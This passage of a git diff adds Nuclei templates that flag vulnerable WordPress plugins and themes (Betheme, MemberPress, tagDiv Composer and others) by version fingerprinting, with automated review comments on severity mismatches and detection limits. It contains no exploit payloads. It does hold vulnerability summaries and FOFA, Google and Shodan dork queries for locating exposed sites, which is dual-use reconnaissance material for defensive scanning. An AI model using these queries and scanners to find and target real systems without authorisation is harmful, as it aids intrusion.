+ cve-id: CVE-2022-4539
+ metadata:
+ fofa-query: "wp-content/plugins/web-application-firewall/"
+ google-query: inurl:"/wp-content/plugins/web-application-firewall/"
+ shodan-query: 'vuln:CVE-2022-4539'
+ tags: cve,wordpress,wp-plugin,web-application-firewall,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/web-application-firewall/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "web-application-firewall"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-2694.yaml b/poc/cve/CVE-2024-2694.yaml
new file mode 100644
index 0000000000..b4ffc1d32d
--- /dev/null
+++ b/poc/cve/CVE-2024-2694.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-2694
+
+info:
+ name: >
+ Betheme <= 27.5.6 - Authenticated (Contributor+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Betheme theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 27.5.6 via deserialization of untrusted input of the 'mfn-page-items' post meta value. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a7c31409-c84a-4197-b08c-b70df5e66a80?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-2694
+ metadata:
+ fofa-query: "wp-content/themes/betheme/"
+ google-query: inurl:"/wp-content/themes/betheme/"
+ shodan-query: 'vuln:CVE-2024-2694'
+ tags: cve,wordpress,wp-theme,betheme,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/betheme/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "betheme"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 27.5.6')
\ No newline at end of file
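Review bot: `severity: low` and the trailing `low` tag disagree with the template's own `cvss-score: 8.8` / `cvss-metrics: ...C:H/I:H/A:H`, which is a High rating; if the downgrade is deliberate because the description says no POP chain is known, the description should say so explicitly, e.g. `Severity is set to low because no gadget chain is known in Betheme itself; treat it as high where another installed plugin or theme supplies one.`, otherwise set `severity: high` and the tag to match. The same severity/CVSS disagreement appears in CVE-2024-3998 (low vs 6.4), CVE-2024-43212 (high vs 5.3), CVE-2024-43254 (low vs 4.3) and CVE-2024-4401 (low vs 6.4) later in this commit. Separately, the poc.txt hunk for this file lists an existing `./poc/cve/CVE-2024-2694-b120e064dbe03fdfe7dc85edf005b468.yaml` as context next to the new `CVE-2024-2694.yaml`, so this CVE now likely has two templates that both fire on one host; the same holds for CVE-2024-3998, CVE-2024-43212, CVE-2024-43254 and CVE-2024-4401, whose hashed or plain siblings are also context lines in poc.txt.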
diff --git a/poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml b/poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml
new file mode 100644
index 0000000000..0ccc116688
--- /dev/null
+++ b/poc/cve/CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-3886-5b264146b1ead99350dd9d50b9b165a5
+
+info:
+ name: >
+ tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[]
+ author: topscoder
+ severity: medium
+ description: >
+ The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_check_envato_code function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed9db9c1-c6b5-459e-9820-ec4ee47b244e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-3886
+ metadata:
+ fofa-query: "wp-content/plugins/td-composer/"
+ google-query: inurl:"/wp-content/plugins/td-composer/"
+ shodan-query: 'vuln:CVE-2024-3886'
+ tags: cve,wordpress,wp-plugin,td-composer,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "td-composer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-3998.yaml b/poc/cve/CVE-2024-3998.yaml
new file mode 100644
index 0000000000..4be5290157
--- /dev/null
+++ b/poc/cve/CVE-2024-3998.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-3998
+
+info:
+ name: >
+ Betheme | Responsive Multipurpose WordPress & WooCommerce Theme <= 27.5.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Betheme theme for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes in all versions up to, and including, 27.5.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b655b04-1f2f-4745-8237-7ef3f8e31ace?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-3998
+ metadata:
+ fofa-query: "wp-content/themes/betheme/"
+ google-query: inurl:"/wp-content/themes/betheme/"
+ shodan-query: 'vuln:CVE-2024-3998'
+ tags: cve,wordpress,wp-theme,betheme,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/betheme/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "betheme"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 27.5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml b/poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml
new file mode 100644
index 0000000000..df69cc097a
--- /dev/null
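Review bot: The description introduces `The Betheme theme for WordPress` and then refers to `several of the plugin's shortcodes`, while the tags say `wp-theme`; change the second phrase to `several of the theme's shortcodes`. The CVE-2024-2694 template earlier in this commit has the same theme/plugin slip in `No known POP chain is present in the vulnerable plugin`.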
+++ b/poc/cve/CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43212-b599c8548f771f0451cdc13214f7ff68
+
+info:
+ name: >
+ WpTravelly <= 1.7.7 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The WordPress Tour & Travel Booking Plugin for WooCommerce – WpTravelly plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the ttbm_trash_post() function in all versions up to, and including, 1.7.7. This makes it possible for unauthenticated attackers to trash posts.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/83a3ed21-bfef-4aef-a32d-5af5be23a067?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43212
+ metadata:
+ fofa-query: "wp-content/plugins/tour-booking-manager/"
+ google-query: inurl:"/wp-content/plugins/tour-booking-manager/"
+ shodan-query: 'vuln:CVE-2024-43212'
+ tags: cve,wordpress,wp-plugin,tour-booking-manager,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tour-booking-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tour-booking-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml b/poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml
new file mode 100644
index 0000000000..0c67e5b2fd
--- /dev/null
+++ b/poc/cve/CVE-2024-43254-ab3e4aac5098aa3c00587af765319448.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43254-ab3e4aac5098aa3c00587af765319448
+
+info:
+ name: >
+ Smart Online Order for Clover <= 1.5.6 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/34d990b6-3021-45d4-9ecd-cfabb7fbc96c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43254
+ metadata:
+ fofa-query: "wp-content/plugins/clover-online-orders/"
+ google-query: inurl:"/wp-content/plugins/clover-online-orders/"
+ shodan-query: 'vuln:CVE-2024-43254'
+ tags: cve,wordpress,wp-plugin,clover-online-orders,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clover-online-orders"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-4401.yaml b/poc/cve/CVE-2024-4401.yaml
new file mode 100644
index 0000000000..1b4eb70899
--- /dev/null
+++ b/poc/cve/CVE-2024-4401.yaml
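Review bot: Detection here is version-only: the `dsl` matcher passes whenever `readme.txt` reports a `Stable tag` of at most 1.5.6, and the `word` matcher on `clover-online-orders` only confirms that the file belongs to this plugin, so a site whose readme lags the installed code, or that carries a backported fix, is reported as vulnerable without the missing capability check ever being exercised. In the other direction, `Stable tag: trunk` or a pre-release string matches nothing against `([0-9.]+)`, and with `matchers-condition: and` the whole template then becomes a silent miss rather than a reported error. I would state both limits in the template, for example a comment under `matchers:` such as `# version fingerprint only: the vulnerable function is not exercised; a readme that lags the installed version yields a false positive, a non-numeric Stable tag yields no result`. The same applies to every readme.txt- and style.css-based template in this commit.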
@@ -0,0 +1,59 @@
+id: CVE-2024-4401
+
+info:
+ name: >
+ Elementor Addon Elements <= 1.13.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via id and eae_slider_animation Parameters
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ and 'eae_slider_animation' parameters in all versions up to, and including, 1.13.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ecfc1466-41d2-498b-8210-c67e8550f5b8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-4401
+ metadata:
+ fofa-query: "wp-content/plugins/addon-elements-for-elementor-page-builder/"
+ google-query: inurl:"/wp-content/plugins/addon-elements-for-elementor-page-builder/"
+ shodan-query: 'vuln:CVE-2024-4401'
+ tags: cve,wordpress,wp-plugin,addon-elements-for-elementor-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/addon-elements-for-elementor-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "addon-elements-for-elementor-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5024.yaml b/poc/cve/CVE-2024-5024.yaml
new file mode 100644
index 0000000000..e235ef8048
--- /dev/null
+++ b/poc/cve/CVE-2024-5024.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5024
+
+info:
+ name: >
+ MemberPress <= 1.11.29 - Reflected Cross-Site Scripting via mepr_screenname and mepr_key Parameters
+ author: topscoder
+ severity: medium
+ description: >
+ The Memberpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mepr_screenname' and 'mepr_key' parameter in all versions up to, and including, 1.11.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/718d12fe-31e4-4fa1-ba9a-8626df8ddbfe?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-5024
+ metadata:
+ fofa-query: "wp-content/plugins/memberpress/"
+ google-query: inurl:"/wp-content/plugins/memberpress/"
+ shodan-query: 'vuln:CVE-2024-5024'
+ tags: cve,wordpress,wp-plugin,memberpress,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/memberpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "memberpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.11.29')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5061.yaml b/poc/cve/CVE-2024-5061.yaml
new file mode 100644
index 0000000000..a424faa119
--- /dev/null
+++ b/poc/cve/CVE-2024-5061.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5061
+
+info:
+ name: >
+ Enfold <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wrapper_class and class Parameters
+ author: topscoder
+ severity: low
+ description: >
+ The Enfold - Responsive Multi-Purpose Theme theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wrapper_class’ and 'class' parameters in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/25462492-59d2-44b7-81c3-93ac04a08bcc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5061
+ metadata:
+ fofa-query: "wp-content/themes/enfold/"
+ google-query: inurl:"/wp-content/themes/enfold/"
+ shodan-query: 'vuln:CVE-2024-5061'
+ tags: cve,wordpress,wp-theme,enfold,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/enfold/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "enfold"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml b/poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml
new file mode 100644
index 0000000000..562616a0bb
--- /dev/null
+++ b/poc/cve/CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5212-26e8ea237e5eb184a7a3f6926818b07b
+
+info:
+ name: >
+ tagDiv Composer <= 5.0 - Reflected Cross-Site Scripting via envato_code[]
+ author: topscoder
+ severity: medium
+ description: >
+ The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_register_forum_user function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db95415a-5354-498b-8368-58c47d9948de?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-5212
+ metadata:
+ fofa-query: "wp-content/plugins/td-composer/"
+ google-query: inurl:"/wp-content/plugins/td-composer/"
+ shodan-query: 'vuln:CVE-2024-5212'
+ tags: cve,wordpress,wp-plugin,td-composer,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/td-composer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "td-composer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml b/poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml
new file mode 100644
index 0000000000..c91cc4fa0e
--- /dev/null
+++ b/poc/cve/CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5726-014e0e9e4a215d0587195d5062af61a5
+
+info:
+ name: >
+ Timeline Event History <= 3.1 - Authenticated (Contributor+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Timeline Event History plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1 via deserialization of untrusted input 'timelines-data' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/107afaa6-6c0b-43fb-9713-ebc4f1189ea6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-5726
+ metadata:
+ fofa-query: "wp-content/plugins/timeline-event-history/"
+ google-query: inurl:"/wp-content/plugins/timeline-event-history/"
+ shodan-query: 'vuln:CVE-2024-5726'
+ tags: cve,wordpress,wp-plugin,timeline-event-history,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/timeline-event-history/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "timeline-event-history"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5784.yaml b/poc/cve/CVE-2024-5784.yaml
new file mode 100644
index 0000000000..01e50ec768
--- /dev/null
+++ b/poc/cve/CVE-2024-5784.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5784
+
+info:
+ name: >
+ Tutor LMS Pro <= 2.7.2 - Missing Authorization to Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized administrative actions execution due to a missing capability checks on multiple functions like treport_quiz_atttempt_delete and tutor_gc_class_action in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with the subscriber-level access and above, to preform an administrative actions on the site, like comments, posts or users deletion, viewing notifications, etc.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/aa5c23ed-7239-40e1-a795-1ae8d4c2d6c8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
+ cvss-score: 7.1
+ cve-id: CVE-2024-5784
+ metadata:
+ fofa-query: "wp-content/plugins/tutor-pro/"
+ google-query: inurl:"/wp-content/plugins/tutor-pro/"
+ shodan-query: 'vuln:CVE-2024-5784'
+ tags: cve,wordpress,wp-plugin,tutor-pro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tutor-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tutor-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5879.yaml b/poc/cve/CVE-2024-5879.yaml
new file mode 100644
index 0000000000..b7d7182a89
--- /dev/null
+++ b/poc/cve/CVE-2024-5879.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5879
+
+info:
+ name: >
+ HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics <= 11.1.22 - Authenticated (Contributor+) Stored Cross-Site Scripting via HubSpot Meeting Widget
+ author: topscoder
+ severity: low
+ description: >
+ The HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute of the HubSpot Meeting Widget in all versions up to, and including, 11.1.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac004fb0-e178-4e9b-9aa3-b14eab43f22d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5879
+ metadata:
+ fofa-query: "wp-content/plugins/leadin/"
+ google-query: inurl:"/wp-content/plugins/leadin/"
+ shodan-query: 'vuln:CVE-2024-5879'
+ tags: cve,wordpress,wp-plugin,leadin,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "leadin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 11.1.22')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7122.yaml b/poc/cve/CVE-2024-7122.yaml
new file mode 100644
index 0000000000..7b69045b86
--- /dev/null
+++ b/poc/cve/CVE-2024-7122.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7122
+
+info:
+ name: >
+ Elementor Addon Elements <= 1.13.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets
+ author: topscoder
+ severity: low
+ description: >
+ The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.13.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/668621b0-67ef-44fc-a126-e8c4e372666e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-7122
+ metadata:
+ fofa-query: "wp-content/plugins/addon-elements-for-elementor-page-builder/"
+ google-query: inurl:"/wp-content/plugins/addon-elements-for-elementor-page-builder/"
+ shodan-query: 'vuln:CVE-2024-7122'
+ tags: cve,wordpress,wp-plugin,addon-elements-for-elementor-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/addon-elements-for-elementor-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "addon-elements-for-elementor-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml b/poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml
